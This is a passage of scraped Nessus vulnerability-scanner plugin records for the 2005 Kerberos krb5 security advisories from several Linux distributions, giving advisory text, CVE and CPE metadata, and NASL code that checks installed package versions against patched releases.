audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:567\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-devel-1.3.4-17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-libs-1.3.4-17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-server-1.3.4-17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-workstation-1.3.4-17\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T03:30:06", "description": "A number of vulnerabilities have been corrected in this Kerberos\nupdate :\n\nThe rcp protocol would allow a server to instruct a client to write to\narbitrary files outside of the current directory. The Kerberos-aware\nrcp could be abused to copy files from a malicious server\n(CVE-2004-0175).\n\nGael Delalleau discovered an information disclosure vulnerability in\nthe way some telnet clients handled messages from a server. This could\nbe abused by a malicious telnet server to collect information from the\nenvironment of any victim connecting to the server using the Kerberos-\naware telnet client (CVE-2005-0488).\n\nDaniel Wachdorf disovered that in error conditions that could occur in\nresponse to correctly-formatted client requests, the Kerberos 5 KDC\nmay attempt to free uninitialized memory, which could cause the KDC to\ncrash resulting in a Denial of Service (CVE-2005-1174).\n\nDaniel Wachdorf also discovered a single-byte heap overflow in the\nkrb5_unparse_name() function that could, if successfully exploited,\nlead to a crash, resulting in a DoS. To trigger this flaw, an attacker\nwould need to have control of a Kerberos realm that shares a cross-\nrealm key with the target (CVE-2005-1175).\n\nFinally, a double-free flaw was discovered in the krb5_recvauth()\nroutine which could be triggered by a remote unauthenticated attacker.\nThis issue could potentially be exploited to allow for the execution\nof arbitrary code on a KDC. No exploit is currently known to exist\n(CVE-2005-1689).\n\nThe updated packages have been patched to address this issue and\nMandriva urges all users to upgrade to these packages as quickly as\npossible.", "edition": 20, "published": "2005-07-14T00:00:00", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2005:119)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:libkrb53", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:krb5-server", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:libkrb51-devel", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:lib64krb53-devel", "p-cpe:/a:mandriva:linux:lib64krb53", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:ftp-client-krb5", "p-cpe:/a:mandriva:linux:lib64krb51", "p-cpe:/a:mandriva:linux:libkrb53-devel", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5", "p-cpe:/a:mandriva:linux:libkrb51", "p-cpe:/a:mandriva:linux:lib64krb51-devel"], "id": "MANDRAKE_MDKSA-2005-119.NASL", "href": "https://www.tenable.com/plugins/nessus/19201", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:119. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19201);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2019/08/02 13:32:47\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2005-0488\", \"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"CERT\", value:\"259798\");\n script_xref(name:\"CERT\", value:\"623332\");\n script_xref(name:\"CERT\", value:\"885830\");\n script_xref(name:\"MDKSA\", value:\"2005:119\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2005:119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been corrected in this Kerberos\nupdate :\n\nThe rcp protocol would allow a server to instruct a client to write to\narbitrary files outside of the current directory. The Kerberos-aware\nrcp could be abused to copy files from a malicious server\n(CVE-2004-0175).\n\nGael Delalleau discovered an information disclosure vulnerability in\nthe way some telnet clients handled messages from a server. This could\nbe abused by a malicious telnet server to collect information from the\nenvironment of any victim connecting to the server using the Kerberos-\naware telnet client (CVE-2005-0488).\n\nDaniel Wachdorf disovered that in error conditions that could occur in\nresponse to correctly-formatted client requests, the Kerberos 5 KDC\nmay attempt to free uninitialized memory, which could cause the KDC to\ncrash resulting in a Denial of Service (CVE-2005-1174).\n\nDaniel Wachdorf also discovered a single-byte heap overflow in the\nkrb5_unparse_name() function that could, if successfully exploited,\nlead to a crash, resulting in a DoS. To trigger this flaw, an attacker\nwould need to have control of a Kerberos realm that shares a cross-\nrealm key with the target (CVE-2005-1175).\n\nFinally, a double-free flaw was discovered in the krb5_recvauth()\nroutine which could be triggered by a remote unauthenticated attacker.\nThis issue could potentially be exploited to allow for the execution\nof arbitrary code on a KDC. No exploit is currently known to exist\n(CVE-2005-1689).\n\nThe updated packages have been patched to address this issue and\nMandriva urges all users to upgrade to these packages as quickly as\npossible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-002-kdc.txt\"\n );\n # http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-003-recvauth.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20d6a900\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(22, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb51\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb51-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb51\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb51-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"ftp-client-krb5-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"ftp-server-krb5-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"krb5-server-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"krb5-workstation-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64krb51-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64krb51-devel-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libkrb51-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libkrb51-devel-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"telnet-client-krb5-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"telnet-server-krb5-1.3-6.6.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.1\", reference:\"ftp-client-krb5-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"ftp-server-krb5-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"krb5-server-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"krb5-workstation-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64krb53-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64krb53-devel-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libkrb53-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libkrb53-devel-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"telnet-client-krb5-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"telnet-server-krb5-1.3.4-2.3.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"ftp-client-krb5-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"ftp-server-krb5-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"krb5-server-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"krb5-workstation-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64krb53-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64krb53-devel-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libkrb53-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libkrb53-devel-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"telnet-client-krb5-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"telnet-server-krb5-1.3.6-6.1.102mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T02:26:16", "description": "The remote host is affected by the vulnerability described in GLSA-200507-11\n(MIT Kerberos 5: Multiple vulnerabilities)\n\n Daniel Wachdorf discovered that MIT Kerberos 5 could corrupt the\n heap by freeing unallocated memory when receiving a special TCP request\n (CAN-2005-1174). He also discovered that the same request could lead to\n a single-byte heap overflow (CAN-2005-1175). Magnus Hagander discovered\n that krb5_recvauth() function of MIT Kerberos 5 might try to\n double-free memory (CAN-2005-1689).\n \nImpact :\n\n Although exploitation is considered difficult, a remote attacker\n could exploit the single-byte heap overflow and the double-free\n vulnerability to execute arbitrary code, which could lead to the\n compromise of the whole Kerberos realm. A remote attacker could also\n use the heap corruption to cause a Denial of Service.\n \nWorkaround :\n\n There are no known workarounds at this time.", "edition": 19, "published": "2005-07-13T00:00:00", "title": "GLSA-200507-11 : MIT Kerberos 5: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mit-krb5"], "id": "GENTOO_GLSA-200507-11.NASL", "href": "https://www.tenable.com/plugins/nessus/18686", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200507-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18686);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"GLSA\", value:\"200507-11\");\n\n script_name(english:\"GLSA-200507-11 : MIT Kerberos 5: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200507-11\n(MIT Kerberos 5: Multiple vulnerabilities)\n\n Daniel Wachdorf discovered that MIT Kerberos 5 could corrupt the\n heap by freeing unallocated memory when receiving a special TCP request\n (CAN-2005-1174). He also discovered that the same request could lead to\n a single-byte heap overflow (CAN-2005-1175). Magnus Hagander discovered\n that krb5_recvauth() function of MIT Kerberos 5 might try to\n double-free memory (CAN-2005-1689).\n \nImpact :\n\n Although exploitation is considered difficult, a remote attacker\n could exploit the single-byte heap overflow and the double-free\n vulnerability to execute arbitrary code, which could lead to the\n compromise of the whole Kerberos realm. A remote attacker could also\n use the heap corruption to cause a Denial of Service.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-002-kdc.txt\"\n );\n # http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-003-recvauth.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20d6a900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200507-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MIT Kerberos 5 users should upgrade to the latest available\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.4.1-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mit-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-crypt/mit-krb5\", unaffected:make_list(\"ge 1.4.1-r1\"), vulnerable:make_list(\"lt 1.4.1-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MIT Kerberos 5\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T01:38:07", "description": "Daniel Wachdorf reported two problems in the MIT krb5 distribution\nused for network authentication. First, the KDC program from the\nkrb5-kdc package can corrupt the heap by trying to free memory which\nhas already been freed on receipt of a certain TCP connection. This\nvulnerability can cause the KDC to crash, leading to a denial of\nservice. [ CAN-2005-1174] Second, under certain rare circumstances\nthis type of request can lead to a buffer overflow and remote code\nexecution. [ CAN-2005-1175] \n\nAdditionally, Magnus Hagander reported another problem in which the\nkrb5_recvauth function can in certain circumstances free previously\nfreed memory, potentially leading to the execution of remote code. [\nCAN-2005-1689] \n\nAll of these vulnerabilities are believed difficult to exploit, and no\nexploits have yet been discovered.", "edition": 20, "published": "2005-07-18T00:00:00", "title": "Debian DSA-757-1 : krb5 - buffer overflow, double-free memory", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:krb5"], "id": "DEBIAN_DSA-757.NASL", "href": "https://www.tenable.com/plugins/nessus/19219", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-757. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19219);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:18\");\n\n script_cve_id(\"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"CERT\", value:\"259798\");\n script_xref(name:\"CERT\", value:\"623332\");\n script_xref(name:\"CERT\", value:\"885830\");\n script_xref(name:\"DSA\", value:\"757\");\n\n script_name(english:\"Debian DSA-757-1 : krb5 - buffer overflow, double-free memory\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Daniel Wachdorf reported two problems in the MIT krb5 distribution\nused for network authentication. First, the KDC program from the\nkrb5-kdc package can corrupt the heap by trying to free memory which\nhas already been freed on receipt of a certain TCP connection. This\nvulnerability can cause the KDC to crash, leading to a denial of\nservice. [ CAN-2005-1174] Second, under certain rare circumstances\nthis type of request can lead to a buffer overflow and remote code\nexecution. [ CAN-2005-1175] \n\nAdditionally, Magnus Hagander reported another problem in which the\nkrb5_recvauth function can in certain circumstances free previously\nfreed memory, potentially leading to the execution of remote code. [\nCAN-2005-1689] \n\nAll of these vulnerabilities are believed difficult to exploit, and no\nexploits have yet been discovered.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-757\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the krb5 package.\n\nFor the old stable distribution (woody), these problems have been\nfixed in version 1.2.4-5woody10. Note that woody's KDC does not have\nTCP support and is not vulnerable to CAN-2005-1174.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1.3.6-2sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"krb5-admin-server\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-clients\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-doc\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-ftpd\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-kdc\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-rsh-server\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-telnetd\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"krb5-user\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkadm55\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkrb5-dev\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkrb53\", reference:\"1.2.4-5woody10\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-admin-server\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-clients\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-doc\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-ftpd\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-kdc\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-rsh-server\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-telnetd\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-user\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkadm55\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb5-dev\", reference:\"1.3.6-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb53\", reference:\"1.3.6-2sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:12:27", "description": "Gael Delalleau discovered a buffer overflow in the env_opt_add()\nfunction of the Kerberos 4 and 5 telnet clients. By sending specially\ncrafted replies, a malicious telnet server could exploit this to\nexecute arbitrary code with the privileges of the user running the\ntelnet client. (CVE-2005-0468)\n\nGael Delalleau discovered a buffer overflow in the handling of the\nLINEMODE suboptions in the telnet clients of Kerberos 4 and 5. By\nsending a specially constructed reply containing a large number of SLC\n(Set Local Character) commands, a remote attacker (i. e. a malicious\ntelnet server) could execute arbitrary commands with the privileges of\nthe user running the telnet client. (CVE-2005-0469)\n\nDaniel Wachdorf discovered two remote vulnerabilities in the Key\nDistribution Center of Kerberos 5 (krb5-kdc). By sending certain TCP\nconnection requests, a remote attacker could trigger a double-freeing\nof memory, which led to memory corruption and a crash of the KDC\nserver. (CVE-2005-1174). Under rare circumstances the same type of TCP\nconnection requests could also trigger a buffer overflow that could be\nexploited to run arbitrary code with the privileges of the KDC server.\n(CVE-2005-1175)\n\nMagnus Hagander discovered that the krb5_recvauth() function attempted\nto free previously freed memory in some situations. A remote attacker\ncould possibly exploit this to run arbitrary code with the privileges\nof the program that called this function. Most imporantly, this\naffects the following daemons: kpropd (from the krb5-kdc package),\nklogind, and kshd (both from the krb5-rsh-server package).\n(CVE-2005-1689)\n\nPlease note that these packages are not officially supported by Ubuntu\n(they are in the 'universe' component of the archive).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 : krb4, krb5 vulnerabilities (USN-224-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0469", "CVE-2005-0468", "CVE-2005-1175"], "modified": "2020-09-02T00:00:00", 